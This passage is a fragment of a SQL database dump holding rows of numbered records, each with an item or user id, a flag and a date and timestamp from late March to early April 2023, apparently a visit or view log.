14:57:08'),(72678,3764,1,'2023-03-28','2023-03-28 15:13:08'),(72679,468,1,'2023-03-28','2023-03-28 15:16:48'),(72680,4966,1,'2023-03-28','2023-03-28 15:18:39'),(72681,1544,1,'2023-03-28','2023-03-28 15:22:25'),(72682,3781,1,'2023-03-28','2023-03-28 15:23:02'),(72683,1596,1,'2023-03-28','2023-03-28 15:25:32'),(72684,4703,1,'2023-03-28','2023-03-28 15:35:11'),(72685,2309,1,'2023-03-28','2023-03-28 15:50:56'),(72686,4960,1,'2023-03-28','2023-03-28 15:52:29'),(72687,1600,1,'2023-03-28','2023-03-28 15:55:37'),(72688,3092,1,'2023-03-28','2023-03-28 15:56:59'),(72689,3781,1,'2023-03-28','2023-03-28 16:16:42'),(72690,4944,1,'2023-03-28','2023-03-28 16:22:55'),(72691,4983,1,'2023-03-28','2023-03-28 16:23:12'),(72692,3781,1,'2023-03-28','2023-03-28 16:26:20'),(72693,4960,1,'2023-03-28','2023-03-28 16:27:19'),(72694,2309,1,'2023-03-28','2023-03-28 16:33:55'),(72695,1600,1,'2023-03-28','2023-03-28 16:43:11'),(72696,3053,1,'2023-03-28','2023-03-28 17:13:20'),(72697,468,1,'2023-03-28','2023-03-28 17:50:00'),(72698,1608,1,'2023-03-28','2023-03-28 18:33:18'),(72699,4960,1,'2023-03-28','2023-03-28 18:39:52'),(72700,89,1,'2023-03-28','2023-03-28 18:42:20'),(72701,4911,1,'2023-03-28','2023-03-28 18:42:41'),(72702,1594,1,'2023-03-28','2023-03-28 18:42:55'),(72703,4911,1,'2023-03-28','2023-03-28 18:43:07'),(72704,1600,1,'2023-03-28','2023-03-28 18:50:37'),(72705,1602,1,'2023-03-28','2023-03-28 18:52:06'),(72706,3781,1,'2023-03-28','2023-03-28 18:58:59'),(72707,3781,1,'2023-03-28','2023-03-28 19:05:09'),(72708,1600,1,'2023-03-28','2023-03-28 19:09:02'),(72709,3764,1,'2023-03-28','2023-03-28 19:09:31'),(72710,4944,1,'2023-03-28','2023-03-28 19:12:49'),(72711,4960,1,'2023-03-28','2023-03-28 19:20:54'),(72712,3023,1,'2023-03-28','2023-03-28 19:45:16'),(72713,1586,1,'2023-03-28','2023-03-28 19:49:44'),(72714,3045,1,'2023-03-28','2023-03-28 19:53:08'),(72715,4944,1,'2023-03-28','2023-03-28 19:57:07'),(72716,2309,1,'2023-03-28','2023-03-28 19:58:19'),(72717,4960,1,'2023-03-28','2023-03-28 20:04:32'),(72718,1596,1,'2023-03-28','2023-03-28 20:04:50'),(72719,3781,1,'2023-03-28','2023-03-28 20:09:59'),(72720,3781,1,'2023-03-28','2023-03-28 20:23:55'),(72721,1600,1,'2023-03-28','2023-03-28 20:27:17'),(72722,4944,1,'2023-03-28','2023-03-28 20:39:31'),(72723,80,1,'2023-03-28','2023-03-28 20:41:06'),(72724,1582,1,'2023-03-28','2023-03-28 20:51:11'),(72725,2309,1,'2023-03-28','2023-03-28 20:53:27'),(72726,4944,1,'2023-03-28','2023-03-28 21:01:15'),(72727,1596,1,'2023-03-28','2023-03-28 21:11:06'),(72728,3781,1,'2023-03-28','2023-03-28 21:12:20'),(72729,5163,1,'2023-03-28','2023-03-28 21:24:45'),(72730,4944,1,'2023-03-28','2023-03-28 21:26:23'),(72731,570,1,'2023-03-28','2023-03-28 21:26:30'),(72732,1600,1,'2023-03-28','2023-03-28 21:27:58'),(72733,1588,1,'2023-03-28','2023-03-28 21:36:14'),(72734,4960,1,'2023-03-28','2023-03-28 21:44:39'),(72735,2309,1,'2023-03-28','2023-03-28 21:52:32'),(72736,2617,1,'2023-03-28','2023-03-28 23:28:42'),(72737,3498,1,'2023-03-29','2023-03-29 02:40:59'),(72738,1610,1,'2023-03-29','2023-03-29 02:46:54'),(72739,470,1,'2023-03-29','2023-03-29 03:31:54'),(72740,470,1,'2023-03-29','2023-03-29 04:07:05'),(72741,474,1,'2023-03-29','2023-03-29 04:52:02'),(72742,487,1,'2023-03-29','2023-03-29 09:38:52'),(72743,473,1,'2023-03-29','2023-03-29 09:38:52'),(72744,487,1,'2023-03-29','2023-03-29 09:50:27'),(72745,473,1,'2023-03-29','2023-03-29 09:50:27'),(72746,473,1,'2023-03-29','2023-03-29 09:55:03'),(72747,487,1,'2023-03-29','2023-03-29 09:55:03'),(72748,4608,1,'2023-03-29','2023-03-29 10:04:46'),(72749,474,1,'2023-03-29','2023-03-29 10:10:50'),(72750,4608,1,'2023-03-29','2023-03-29 10:12:33'),(72751,2609,1,'2023-03-29','2023-03-29 10:22:05'),(72752,4335,1,'2023-03-29','2023-03-29 10:30:46'),(72753,5314,1,'2023-03-29','2023-03-29 10:37:34'),(72754,5314,1,'2023-03-29','2023-03-29 10:37:36'),(72755,2159,1,'2023-03-29','2023-03-29 10:43:36'),(72756,4966,1,'2023-03-29','2023-03-29 10:47:14'),(72757,72,1,'2023-03-29','2023-03-29 11:07:56'),(72758,91,1,'2023-03-29','2023-03-29 11:10:46'),(72759,1594,1,'2023-03-29','2023-03-29 11:30:14'),(72760,2965,1,'2023-03-29','2023-03-29 11:35:50'),(72761,1594,1,'2023-03-29','2023-03-29 11:58:27'),(72762,5323,1,'2023-03-29','2023-03-29 12:27:22'),(72763,5323,1,'2023-03-29','2023-03-29 12:27:23'),(72764,5317,1,'2023-03-29','2023-03-29 12:27:33'),(72765,5320,1,'2023-03-29','2023-03-29 12:27:36'),(72766,5128,1,'2023-03-29','2023-03-29 13:00:17'),(72767,1701,1,'2023-03-29','2023-03-29 13:02:58'),(72768,1701,1,'2023-03-29','2023-03-29 13:06:21'),(72769,4960,1,'2023-03-29','2023-03-29 13:13:31'),(72770,4551,1,'2023-03-29','2023-03-29 13:20:49'),(72771,5163,1,'2023-03-29','2023-03-29 13:36:27'),(72772,4966,1,'2023-03-29','2023-03-29 13:42:10'),(72773,1596,1,'2023-03-29','2023-03-29 13:50:12'),(72774,1612,1,'2023-03-29','2023-03-29 14:22:46'),(72775,5163,1,'2023-03-29','2023-03-29 14:47:02'),(72776,1596,1,'2023-03-29','2023-03-29 14:49:55'),(72777,76,1,'2023-03-29','2023-03-29 14:52:57'),(72778,570,1,'2023-03-29','2023-03-29 15:22:23'),(72779,1722,1,'2023-03-29','2023-03-29 15:25:31'),(72780,570,1,'2023-03-29','2023-03-29 15:38:32'),(72781,4966,1,'2023-03-29','2023-03-29 15:41:15'),(72782,1766,1,'2023-03-29','2023-03-29 16:08:36'),(72783,5317,1,'2023-03-29','2023-03-29 16:36:50'),(72784,5317,1,'2023-03-29','2023-03-29 16:36:55'),(72785,5320,1,'2023-03-29','2023-03-29 16:36:58'),(72786,5320,1,'2023-03-29','2023-03-29 16:36:59'),(72787,5320,1,'2023-03-29','2023-03-29 16:37:26'),(72788,5314,1,'2023-03-29','2023-03-29 16:37:43'),(72789,5314,1,'2023-03-29','2023-03-29 16:37:47'),(72790,5323,1,'2023-03-29','2023-03-29 16:38:17'),(72791,5323,1,'2023-03-29','2023-03-29 16:38:27'),(72792,5314,1,'2023-03-29','2023-03-29 16:38:33'),(72793,5314,1,'2023-03-29','2023-03-29 16:39:03'),(72794,1608,1,'2023-03-29','2023-03-29 16:49:57'),(72795,5320,1,'2023-03-29','2023-03-29 17:30:27'),(72796,570,1,'2023-03-29','2023-03-29 18:01:04'),(72797,570,1,'2023-03-29','2023-03-29 18:01:50'),(72798,91,1,'2023-03-29','2023-03-29 19:21:01'),(72799,4612,1,'2023-03-29','2023-03-29 19:21:29'),(72800,4944,1,'2023-03-29','2023-03-29 19:43:38'),(72801,4944,1,'2023-03-29','2023-03-29 19:44:41'),(72802,570,1,'2023-03-29','2023-03-29 20:32:51'),(72803,2297,1,'2023-03-29','2023-03-29 20:35:52'),(72804,4983,1,'2023-03-29','2023-03-29 21:20:31'),(72805,4448,1,'2023-03-29','2023-03-29 21:37:37'),(72806,4983,1,'2023-03-29','2023-03-29 21:37:53'),(72807,4983,1,'2023-03-29','2023-03-29 21:38:39'),(72808,4977,1,'2023-03-29','2023-03-29 22:22:14'),(72809,474,1,'2023-03-29','2023-03-29 22:24:34'),(72810,1722,1,'2023-03-29','2023-03-29 22:43:13'),(72811,4753,1,'2023-03-29','2023-03-29 22:51:42'),(72812,4768,1,'2023-03-29','2023-03-29 22:58:20'),(72813,2154,1,'2023-03-29','2023-03-29 23:17:53'),(72814,4980,1,'2023-03-29','2023-03-29 23:22:18'),(72815,4768,1,'2023-03-29','2023-03-29 23:24:58'),(72816,4668,1,'2023-03-29','2023-03-29 23:27:23'),(72817,4980,1,'2023-03-29','2023-03-29 23:34:05'),(72818,473,1,'2023-03-29','2023-03-29 23:49:44'),(72819,468,1,'2023-03-30','2023-03-30 00:32:32'),(72820,3023,1,'2023-03-30','2023-03-30 00:49:18'),(72821,91,1,'2023-03-30','2023-03-30 00:57:28'),(72822,3045,1,'2023-03-30','2023-03-30 01:05:47'),(72823,89,1,'2023-03-30','2023-03-30 02:24:58'),(72824,4759,1,'2023-03-30','2023-03-30 02:29:57'),(72825,4960,1,'2023-03-30','2023-03-30 02:55:47'),(72826,4753,1,'2023-03-30','2023-03-30 04:34:12'),(72827,5128,1,'2023-03-30','2023-03-30 04:35:26'),(72828,4988,1,'2023-03-30','2023-03-30 04:41:35'),(72829,4747,1,'2023-03-30','2023-03-30 05:13:03'),(72830,470,1,'2023-03-30','2023-03-30 05:27:18'),(72831,473,1,'2023-03-30','2023-03-30 05:30:22'),(72832,3251,1,'2023-03-30','2023-03-30 05:47:39'),(72833,3023,1,'2023-03-30','2023-03-30 06:27:04'),(72834,4341,1,'2023-03-30','2023-03-30 06:39:33'),(72835,80,1,'2023-03-30','2023-03-30 07:38:18'),(72836,68,1,'2023-03-30','2023-03-30 07:38:23'),(72837,108,1,'2023-03-30','2023-03-30 07:38:26'),(72838,487,1,'2023-03-30','2023-03-30 07:43:09'),(72839,4357,1,'2023-03-30','2023-03-30 07:49:35'),(72840,4238,1,'2023-03-30','2023-03-30 07:49:35'),(72841,68,1,'2023-03-30','2023-03-30 08:19:08'),(72842,68,1,'2023-03-30','2023-03-30 08:19:45'),(72843,89,1,'2023-03-30','2023-03-30 08:27:51'),(72844,4377,1,'2023-03-30','2023-03-30 08:30:18'),(72845,2658,1,'2023-03-30','2023-03-30 08:35:04'),(72846,68,1,'2023-03-30','2023-03-30 08:52:48'),(72847,1766,1,'2023-03-30','2023-03-30 09:12:09'),(72848,1612,1,'2023-03-30','2023-03-30 09:22:59'),(72849,4944,1,'2023-03-30','2023-03-30 09:33:46'),(72850,5076,1,'2023-03-30','2023-03-30 09:47:22'),(72851,4420,1,'2023-03-30','2023-03-30 09:51:04'),(72852,1724,1,'2023-03-30','2023-03-30 09:56:10'),(72853,570,1,'2023-03-30','2023-03-30 09:57:14'),(72854,4335,1,'2023-03-30','2023-03-30 09:57:53'),(72855,1604,1,'2023-03-30','2023-03-30 10:31:53'),(72856,1604,1,'2023-03-30','2023-03-30 10:33:23'),(72857,68,1,'2023-03-30','2023-03-30 10:33:39'),(72858,5050,1,'2023-03-30','2023-03-30 10:37:52'),(72859,2410,1,'2023-03-30','2023-03-30 10:41:57'),(72860,3764,1,'2023-03-30','2023-03-30 10:59:06'),(72861,5062,1,'2023-03-30','2023-03-30 10:59:11'),(72862,1604,1,'2023-03-30','2023-03-30 11:03:07'),(72863,68,1,'2023-03-30','2023-03-30 11:03:32'),(72864,1604,1,'2023-03-30','2023-03-30 11:05:04'),(72865,5334,1,'2023-03-30','2023-03-30 11:11:56'),(72866,5334,1,'2023-03-30','2023-03-30 11:11:57'),(72867,4657,1,'2023-03-30','2023-03-30 12:42:07'),(72868,1751,1,'2023-03-30','2023-03-30 12:50:34'),(72869,4457,1,'2023-03-30','2023-03-30 13:11:31'),(72870,1699,1,'2023-03-30','2023-03-30 13:16:53'),(72871,2813,1,'2023-03-30','2023-03-30 13:52:00'),(72872,1747,1,'2023-03-30','2023-03-30 14:20:00'),(72873,1586,1,'2023-03-30','2023-03-30 14:43:21'),(72874,4911,1,'2023-03-30','2023-03-30 14:48:09'),(72875,2395,1,'2023-03-30','2023-03-30 14:48:19'),(72876,4412,1,'2023-03-30','2023-03-30 15:06:57'),(72877,5116,1,'2023-03-30','2023-03-30 15:08:12'),(72878,4966,1,'2023-03-30','2023-03-30 15:08:16'),(72879,80,1,'2023-03-30','2023-03-30 15:08:25'),(72880,4966,1,'2023-03-30','2023-03-30 15:08:27'),(72881,5116,1,'2023-03-30','2023-03-30 15:10:37'),(72882,4960,1,'2023-03-30','2023-03-30 15:57:47'),(72883,1598,1,'2023-03-30','2023-03-30 15:58:55'),(72884,5334,1,'2023-03-30','2023-03-30 16:34:39'),(72885,5334,1,'2023-03-30','2023-03-30 16:34:40'),(72886,5334,1,'2023-03-30','2023-03-30 16:34:43'),(72887,5334,1,'2023-03-30','2023-03-30 16:35:35'),(72888,5334,1,'2023-03-30','2023-03-30 16:35:38'),(72889,4776,1,'2023-03-30','2023-03-30 16:36:58'),(72890,4335,1,'2023-03-30','2023-03-30 17:11:46'),(72891,1600,1,'2023-03-30','2023-03-30 17:19:53'),(72892,76,1,'2023-03-30','2023-03-30 17:22:41'),(72893,87,1,'2023-03-30','2023-03-30 17:22:57'),(72894,4412,1,'2023-03-30','2023-03-30 19:07:03'),(72895,3079,1,'2023-03-30','2023-03-30 19:33:47'),(72896,5256,1,'2023-03-30','2023-03-30 21:10:00'),(72897,68,1,'2023-03-30','2023-03-30 21:42:54'),(72898,2989,1,'2023-03-30','2023-03-30 21:46:53'),(72899,4448,1,'2023-03-30','2023-03-30 22:03:25'),(72900,4448,1,'2023-03-30','2023-03-30 23:06:54'),(72901,5163,1,'2023-03-30','2023-03-30 23:14:07'),(72902,5163,1,'2023-03-30','2023-03-30 23:14:07'),(72903,1600,1,'2023-03-30','2023-03-30 23:47:14'),(72904,5037,1,'2023-03-30','2023-03-30 23:58:54'),(72905,5101,1,'2023-03-31','2023-03-31 00:28:50'),(72906,4329,1,'2023-03-31','2023-03-31 00:53:20'),(72907,2658,1,'2023-03-31','2023-03-31 01:40:57'),(72908,3285,1,'2023-03-31','2023-03-31 03:16:04'),(72909,2309,1,'2023-03-31','2023-03-31 04:57:27'),(72910,3482,1,'2023-03-31','2023-03-31 05:02:00'),(72911,3791,1,'2023-03-31','2023-03-31 05:25:35'),(72912,5137,1,'2023-03-31','2023-03-31 06:16:15'),(72913,5317,1,'2023-03-31','2023-03-31 07:01:09'),(72914,3226,1,'2023-03-31','2023-03-31 07:05:07'),(72915,3285,1,'2023-03-31','2023-03-31 07:09:54'),(72916,4457,1,'2023-03-31','2023-03-31 07:46:40'),(72917,5028,1,'2023-03-31','2023-03-31 08:31:44'),(72918,2150,1,'2023-03-31','2023-03-31 09:16:24'),(72919,2150,1,'2023-03-31','2023-03-31 10:01:03'),(72920,4960,1,'2023-03-31','2023-03-31 10:04:35'),(72921,87,1,'2023-03-31','2023-03-31 10:36:50'),(72922,1602,1,'2023-03-31','2023-03-31 10:53:24'),(72923,1602,1,'2023-03-31','2023-03-31 11:25:15'),(72924,4963,1,'2023-03-31','2023-03-31 11:45:05'),(72925,467,1,'2023-03-31','2023-03-31 12:20:03'),(72926,4238,1,'2023-03-31','2023-03-31 14:06:33'),(72927,5157,1,'2023-03-31','2023-03-31 14:58:29'),(72928,5330,1,'2023-03-31','2023-03-31 15:00:46'),(72929,4966,1,'2023-03-31','2023-03-31 15:08:22'),(72930,89,1,'2023-03-31','2023-03-31 15:10:27'),(72931,4966,1,'2023-03-31','2023-03-31 15:11:30'),(72932,87,1,'2023-03-31','2023-03-31 15:11:45'),(72933,76,1,'2023-03-31','2023-03-31 15:12:12'),(72934,1594,1,'2023-03-31','2023-03-31 15:40:17'),(72935,5326,1,'2023-03-31','2023-03-31 16:34:41'),(72936,2159,1,'2023-03-31','2023-03-31 16:52:19'),(72937,5326,1,'2023-03-31','2023-03-31 17:34:41'),(72938,3430,1,'2023-03-31','2023-03-31 18:43:04'),(72939,471,1,'2023-03-31','2023-03-31 19:10:02'),(72940,4759,1,'2023-03-31','2023-03-31 19:58:41'),(72941,1734,1,'2023-03-31','2023-03-31 20:50:20'),(72942,1701,1,'2023-03-31','2023-03-31 21:02:55'),(72943,4911,1,'2023-03-31','2023-03-31 21:23:04'),(72944,1745,1,'2023-03-31','2023-03-31 21:26:09'),(72945,4323,1,'2023-03-31','2023-03-31 21:49:23'),(72946,1594,1,'2023-03-31','2023-03-31 22:08:44'),(72947,1594,1,'2023-03-31','2023-03-31 22:12:48'),(72948,2457,1,'2023-03-31','2023-03-31 22:25:45'),(72949,2457,1,'2023-03-31','2023-03-31 22:26:00'),(72950,91,1,'2023-03-31','2023-03-31 22:50:44'),(72951,68,1,'2023-03-31','2023-03-31 22:57:19'),(72952,2159,1,'2023-03-31','2023-03-31 23:12:10'),(72953,471,1,'2023-03-31','2023-03-31 23:12:13'),(72954,3430,1,'2023-03-31','2023-03-31 23:12:13'),(72955,2410,1,'2023-03-31','2023-03-31 23:12:14'),(72956,3664,1,'2023-03-31','2023-03-31 23:12:16'),(72957,2658,1,'2023-03-31','2023-03-31 23:12:17'),(72958,3104,1,'2023-03-31','2023-03-31 23:12:18'),(72959,80,1,'2023-04-01','2023-04-01 00:12:26'),(72960,3004,1,'2023-04-01','2023-04-01 00:50:57'),(72961,4950,1,'2023-04-01','2023-04-01 01:00:58'),(72962,89,1,'2023-04-01','2023-04-01 01:25:54'),(72963,3307,1,'2023-04-01','2023-04-01 02:10:06'),(72964,3781,1,'2023-04-01','2023-04-01 03:01:58'),(72965,4323,1,'2023-04-01','2023-04-01 03:04:37'),(72966,1602,1,'2023-04-01','2023-04-01 03:42:25'),(72967,3691,1,'2023-04-01','2023-04-01 04:03:18'),(72968,5080,1,'2023-04-01','2023-04-01 04:12:45'),(72969,76,1,'2023-04-01','2023-04-01 04:20:31'),(72970,2964,1,'2023-04-01','2023-04-01 05:28:41'),(72971,4930,1,'2023-04-01','2023-04-01 06:09:06'),(72972,3072,1,'2023-04-01','2023-04-01 06:38:08'),(72973,2904,1,'2023-04-01','2023-04-01 07:00:46'),(72974,4432,1,'2023-04-01','2023-04-01 07:23:24'),(72975,4750,1,'2023-04-01','2023-04-01 07:47:47'),(72976,4747,1,'2023-04-01','2023-04-01 08:16:05'),(72977,1870,1,'2023-04-01','2023-04-01 08:43:41'),(72978,4911,1,'2023-04-01','2023-04-01 09:28:19'),(72979,1544,1,'2023-04-01','2023-04-01 09:44:38'),(72980,4457,1,'2023-04-01','2023-04-01 10:10:11'),(72981,1586,1,'2023-04-01','2023-04-01 11:19:34'),(72982,87,1,'2023-04-01','2023-04-01 11:20:12'),(72983,473,1,'2023-04-01','2023-04-01 11:20:30'),(72984,76,1,'2023-04-01','2023-04-01 11:27:02'),(72985,473,1,'2023-04-01','2023-04-01 11:27:06'),(72986,1602,1,'2023-04-01','2023-04-01 11:39:30'),(72987,3069,1,'2023-04-01','2023-04-01 11:40:11'),(72988,5256,1,'2023-04-01','2023-04-01 12:07:13'),(72989,1596,1,'2023-04-01','2023-04-01 12:25:50'),(72990,3534,1,'2023-04-01','2023-04-01 13:10:07'),(72991,570,1,'2023-04-01','2023-04-01 13:16:23'),(72992,4510,1,'2023-04-01','2023-04-01 13:20:16'),(72993,5256,1,'2023-04-01','2023-04-01 13:37:33'),(72994,3764,1,'2023-04-01','2023-04-01 13:53:23'),(72995,4576,1,'2023-04-01','2023-04-01 13:59:20'),(72996,4963,1,'2023-04-01','2023-04-01 13:59:50'),(72997,4556,1,'2023-04-01','2023-04-01 14:01:35'),(72998,4508,1,'2023-04-01','2023-04-01 14:06:17'),(72999,4750,1,'2023-04-01','2023-04-01 14:11:19'),(73000,3030,1,'2023-04-01','2023-04-01 14:17:49'),(73001,4618,1,'2023-04-01','2023-04-01 14:29:43'),(73002,3710,1,'2023-04-01','2023-04-01 14:35:43'),(73003,4448,1,'2023-04-01','2023-04-01 14:41:36'),(73004,570,1,'2023-04-01','2023-04-01 14:45:29'),(73005,5163,1,'2023-04-01','2023-04-01 14:46:11'),(73006,4556,1,'2023-04-01','2023-04-01 14:57:54'),(73007,4510,1,'2023-04-01','2023-04-01 15:00:33'),(73008,3180,1,'2023-04-01','2023-04-01 15:09:40'),(73009,4396,1,'2023-04-01','2023-04-01 15:14:06'),(73010,2904,1,'2023-04-01','2023-04-01 15:17:54'),(73011,68,1,'2023-04-01','2023-04-01 15:23:57'),(73012,1602,1,'2023-04-01','2023-04-01 15:24:26'),(73013,5153,1,'2023-04-01','2023-04-01 15:28:08'),(73014,4404,1,'2023-04-01','2023-04-01 15:47:00'),(73015,3707,1,'2023-04-01','2023-04-01 15:54:18'),(73016,3707,1,'2023-04-01','2023-04-01 15:55:24'),(73017,4750,1,'2023-04-01','2023-04-01 15:57:47'),(73018,4448,1,'2023-04-01','2023-04-01 16:06:40'),(73019,1870,1,'2023-04-01','2023-04-01 16:07:03'),(73020,4747,1,'2023-04-01','2023-04-01 16:09:42'),(73021,2297,1,'2023-04-01','2023-04-01 16:12:09'),(73022,4448,1,'2023-04-01','2023-04-01 16:31:32'),(73023,4685,1,'2023-04-01','2023-04-01 16:51:10'),(73024,4323,1,'2023-04-01','2023-04-01 16:51:14'),(73025,5137,1,'2023-04-01','2023-04-01 16:56:33'),(73026,3090,1,'2023-04-01','2023-04-01 17:06:14'),(73027,4762,1,'2023-04-01','2023-04-01 17:20:09'),(73028,5314,1,'2023-04-01','2023-04-01 17:36:21'),(73029,2558,1,'2023-04-01','2023-04-01 18:14:22'),(73030,72,1,'2023-04-01','2023-04-01 18:53:03'),(73031,91,1,'2023-04-01','2023-04-01 19:07:47'),(73032,4980,1,'2023-04-01','2023-04-01 19:22:46'),(73033,4326,1,'2023-04-01','2023-04-01 19:23:32'),(73034,3764,1,'2023-04-01','2023-04-01 19:25:13'),(73035,5280,1,'2023-04-01','2023-04-01 19:27:05'),(73036,4759,1,'2023-04-01','2023-04-01 19:48:54'),(73037,1600,1,'2023-04-01','2023-04-01 20:12:28'),(73038,4753,1,'2023-04-01','2023-04-01 20:22:45'),(73039,2617,1,'2023-04-01','2023-04-01 20:29:38'),(73040,4717,1,'2023-04-01','2023-04-01 21:04:45'),(73041,5334,1,'2023-04-01','2023-04-01 21:19:19'),(73042,4657,1,'2023-04-01','2023-04-01 22:38:03'),(73043,4911,1,'2023-04-01','2023-04-01 22:59:21'),(73044,1600,1,'2023-04-01','2023-04-01 23:17:15'),(73045,4911,1,'2023-04-02','2023-04-02 00:26:17'),(73046,3788,1,'2023-04-02','2023-04-02 00:34:58'),(73047,3124,1,'2023-04-02','2023-04-02 00:38:29'),(73048,570,1,'2023-04-02','2023-04-02 01:03:51'),(73049,1705,1,'2023-04-02','2023-04-02 02:20:02'),(73050,3034,1,'2023-04-02','2023-04-02 02:35:01'),(73051,4323,1,'2023-04-02','2023-04-02 03:11:06'),(73052,3714,1,'2023-04-02','2023-04-02 03:15:16'),(73053,1586,1,'2023-04-02','2023-04-02 03:18:14'),(73054,3104,1,'2023-04-02','2023-04-02 03:29:43'),(73055,3079,1,'2023-04-02','2023-04-02 03:37:48'),(73056,3486,1,'2023-04-02','2023-04-02 03:52:51'),(73057,3079,1,'2023-04-02','2023-04-02 04:08:49'),(73058,3104,1,'2023-04-02','2023-04-02 04:14:46'),(73059,3240,1,'2023-04-02','2023-04-02 04:20:58'),(73060,4520,1,'2023-04-02','2023-04-02 04:54:25'),(73061,4759,1,'2023-04-02','2023-04-02 04:54:51'),(73062,3764,1,'2023-04-02','2023-04-02 05:17:03'),(73063,3714,1,'2023-04-02','2023-04-02 06:01:13'),(73064,2609,1,'2023-04-02','2023-04-02 06:10:57'),(73065,1745,1,'2023-04-02','2023-04-02 06:24:19'),(73066,3749,1,'2023-04-02','2023-04-02 06:36:14'),(73067,4377,1,'2023-04-02','2023-04-02 06:52:43'),(73068,3710,1,'2023-04-02','2023-04-02 07:16:58'),(73069,1598,1,'2023-04-02','2023-04-02 08:05:01'),(73070,91,1,'2023-04-02','2023-04-02 08:17:54'),(73071,1614,1,'2023-04-02','2023-04-02 08:49:59'),(73072,4444,1,'2023-04-02','2023-04-02 09:17:29'),(73073,1594,1,'2023-04-02','2023-04-02 09:42:07'),(73074,2989,1,'2023-04-02','2023-04-02 09:51:00'),(73075,4930,1,'2023-04-02','2023-04-02 10:19:42'),(73076,4323,1,'2023-04-02','2023-04-02 10:49:51'),(73077,1608,1,'2023-04-02','2023-04-02 11:43:07'),(73078,3006,1,'2023-04-02','2023-04-02 11:50:44'),(73079,4329,1,'2023-04-02','2023-04-02 12:19:37'),(73080,4416,1,'2023-04-02','2023-04-02 12:28:32'),(73081,1544,1,'2023-04-02','2023-04-02 12:45:22'),(73082,91,1,'2023-04-02','2023-04-02 12:56:16'),(73083,474,1,'2023-04-02','2023-04-02 13:37:16'),(73084,5042,1,'2023-04-02','2023-04-02 13:37:52'),(73085,474,1,'2023-04-02','2023-04-02 14:52:24'),(73086,4759,1,'2023-04-02','2023-04-02 18:31:09'),(73087,3746,1,'2023-04-02','2023-04-02 18:47:11'),(73088,1718,1,'2023-04-02','2023-04-02 19:01:12'),(73089,1608,1,'2023-04-02','2023-04-02 19:08:19'),(73090,1745,1,'2023-04-02','2023-04-02 19:15:39'),(73091,1770,1,'2023-04-02','2023-04-02 19:38:24'),(73092,3004,1,'2023-04-02','2023-04-02 21:37:57'),(73093,3004,1,'2023-04-02','2023-04-02 21:38:36'),(73094,1594,1,'2023-04-02','2023-04-02 21:45:28'),(73095,3004,1,'2023-04-02','2023-04-02 21:53:37'),(73096,1594,1,'2023-04-02','2023-04-02 22:39:26'),(73097,5080,1,'2023-04-02','2023-04-02 23:02:10'),(73098,2159,1,'2023-04-02','2023-04-02 23:12:18'),(73099,3267,1,'2023-04-02','2023-04-02 23:24:24'),(73100,2159,1,'2023-04-02','2023-04-02 23:39:25'),(73101,4966,1,'2023-04-02','2023-04-02 23:44:44'),(73102,3313,1,'2023-04-02','2023-04-02 23:45:01'),(73103,2159,1,'2023-04-03','2023-04-03 00:16:06'),(73104,4561,1,'2023-04-03','2023-04-03 01:15:04'),(73105,4944,1,'2023-04-03','2023-04-03 01:40:27'),(73106,1602,1,'2023-04-03','2023-04-03 01:40:32'),(73107,1582,1,'2023-04-03','2023-04-03 01:48:11'),(73108,1743,1,'2023-04-03','2023-04-03 01:55:29'),(73109,4412,1,'2023-04-03','2023-04-03 01:58:48'),(73110,4391,1,'2023-04-03','2023-04-03 02:02:30'),(73111,4703,1,'2023-04-03','2023-04-03 02:21:59'),(73112,5271,1,'2023-04-03','2023-04-03 02:25:27'),(73113,84,1,'2023-04-03','2023-04-03 02:30:35'),(73114,4412,1,'2023-04-03','2023-04-03 02:43:49'),(73115,3489,1,'2023-04-03','2023-04-03 02:55:23'),(73116,1582,1,'2023-04-03','2023-04-03 03:12:20'),(73117,5067,1,'2023-04-03','2023-04-03 04:15:05'),(73118,80,1,'2023-04-03','2023-04-03 04:32:57'),(73119,68,1,'2023-04-03','2023-04-03 05:01:19'),(73120,80,1,'2023-04-03','2023-04-03 05:02:26'),(73121,3263,1,'2023-04-03','2023-04-03 05:05:08'),(73122,68,1,'2023-04-03','2023-04-03 05:07:26'),(73123,4448,1,'2023-04-03','2023-04-03 05:11:17'),(73124,2159,1,'2023-04-03','2023-04-03 05:22:27'),(73125,1745,1,'2023-04-03','2023-04-03 06:21:27'),(73126,4338,1,'2023-04-03','2023-04-03 07:05:37'),(73127,1722,1,'2023-04-03','2023-04-03 07:23:02'),(73128,476,1,'2023-04-03','2023-04-03 07:44:04'),(73129,3087,1,'2023-04-03','2023-04-03 07:55:10'),(73130,3731,1,'2023-04-03','2023-04-03 07:57:54'),(73131,1594,1,'2023-04-03','2023-04-03 08:04:42'),(73132,3285,1,'2023-04-03','2023-04-03 08:32:53'),(73133,4323,1,'2023-04-03','2023-04-03 08:45:36'),(73134,5163,1,'2023-04-03','2023-04-03 09:05:17'),(73135,4966,1,'2023-04-03','2023-04-03 09:07:01'),(73136,473,1,'2023-04-03','2023-04-03 09:41:38'),(73137,487,1,'2023-04-03','2023-04-03 09:41:38'),(73138,570,1,'2023-04-03','2023-04-03 09:45:54'),(73139,3263,1,'2023-04-03','2023-04-03 09:55:30'),(73140,5264,1,'2023-04-03','2023-04-03 10:20:16'),(73141,1600,1,'2023-04-03','2023-04-03 10:29:50'),(73142,1582,1,'2023-04-03','2023-04-03 10:37:15'),(73143,2159,1,'2023-04-03','2023-04-03 10:39:47'),(73144,1594,1,'2023-04-03','2023-04-03 10:51:44'),(73145,4332,1,'2023-04-03','2023-04-03 11:07:53'),(73146,4412,1,'2023-04-03','2023-04-03 12:19:48'),(73147,1600,1,'2023-04-03','2023-04-03 12:23:30'),(73148,1600,1,'2023-04-03','2023-04-03 12:24:59'),(73149,4412,1,'2023-04-03','2023-04-03 12:26:21'),(73150,1596,1,'2023-04-03','2023-04-03 12:35:38'),(73151,2161,1,'2023-04-03','2023-04-03 13:00:59'),(73152,91,1,'2023-04-03','2023-04-03 13:11:06'),(73153,1582,1,'2023-04-03','2023-04-03 13:13:15'),(73154,4408,1,'2023-04-03','2023-04-03 13:14:45'),(73155,91,1,'2023-04-03','2023-04-03 13:15:10'),(73156,4404,1,'2023-04-03','2023-04-03 13:16:09'),(73157,4238,1,'2023-04-03','2023-04-03 13:34:53'),(73158,4622,1,'2023-04-03','2023-04-03 13:40:52'),(73159,2309,1,'2023-04-03','2023-04-03 13:43:35'),(73160,1596,1,'2023-04-03','2023-04-03 13:45:15'),(73161,3691,1,'2023-04-03','2023-04-03 14:04:57'),(73162,4612,1,'2023-04-03','2023-04-03 14:41:14'),(73163,1582,1,'2023-04-03','2023-04-03 